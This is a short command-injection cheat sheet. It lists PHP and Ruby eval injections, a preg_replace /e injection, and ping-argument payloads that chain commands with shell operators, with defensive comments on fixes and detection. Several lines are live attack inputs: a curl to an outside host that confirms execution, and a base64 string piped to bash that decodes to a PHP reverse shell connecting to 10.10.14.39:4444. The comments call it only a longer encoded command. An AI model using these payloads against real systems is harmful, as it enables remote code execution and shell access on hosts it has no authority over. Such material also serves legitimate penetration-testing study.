
Command Injection

examples

Code Type Exploit
eval("echo \"Hello ".$_GET['name']."!!!\";") php ?name=lorem".system("id")."
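echo preg_replace($_GET['pattern'], $_GET['new'], $_GET['base']); php ?new=hacker&pattern=/lamer/&base=Hello%20lamer
?new=phpinfo()&pattern=/lamer/e&base=Hello%20lamer
(The second input relies on the `/e` pattern modifier, which evaluates the replacement string as PHP code. `/e` was deprecated in PHP 5.5 and removed in PHP 7.0, so this row applies to legacy PHP only; `preg_replace_callback` is the replacement, and the pattern itself should never come from request parameters.)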
$message = eval "\"Hello " + params['username']+"\"" ruby ?username=hacker"%2b`uname`%2b"

ping


ping - linux

ping -c 2 $IP
ping - windows
ping -n 2 $IP

# Shell operators that let a second command run when user input is
# concatenated into a command line; `id` stands in for the appended command.
# The fix is the same for every line below: pass the value as a single argv
# element without invoking a shell, or validate it strictly (for the ping
# case, as an IP address or hostname) before use.
# `|` pipes echo's output into id; both commands run.
echo "hack" | id
# `&` starts echo in the background, then runs id.
echo "hack" & id
# `&&` runs id only when echo exits with status 0.
echo "hack" && id
# `;` runs id after echo regardless of echo's exit status.
echo "hack" ; id
# Same `;` separator, but the appended command makes an outbound HTTP request;
# presumably used to confirm execution when command output is not returned.
# Unexpected egress from the host running ping is the detection signal.
echo "hack" ; curl http://log.michalszalkowski.com/15-01-2023/e-corp/test-42
# The operator appended to the ping argument, with and without surrounding
# spaces: a filter that matches only one spacing misses the other.
ping -c 2 localhost|id
ping -c 2 localhost | id

ping -c 2 localhost;id
ping -c 2 localhost ; ls -la
# The appended command is base64-encoded and decoded at run time ("aWQ=" is
# `id`), so its text never appears in the request and keyword deny-lists do
# not see it. Detect the `base64 -d | bash` chain itself in process telemetry.
ping -c 2 localhost; echo "aWQ=" | base64 -d | bash

# Same decode-and-pipe-to-bash chain with a longer encoded command; decode it
# offline during triage rather than trusting its length or appearance.
ping -c 2 localhost; echo "cGhwIC1yICckc29jaz1mc29ja29wZW4oIjEwLjEwLjE0LjM5Iiw0NDQ0KTskcHJvYz1wcm9jX29wZW4oIi9iaW4vYmFzaCIsIGFycmF5KDA9PiRzb2NrLCAxPT4kc29jaywgMj0+JHNvY2spLCRwaXBlcyk7Jw==" | base64 -d | bash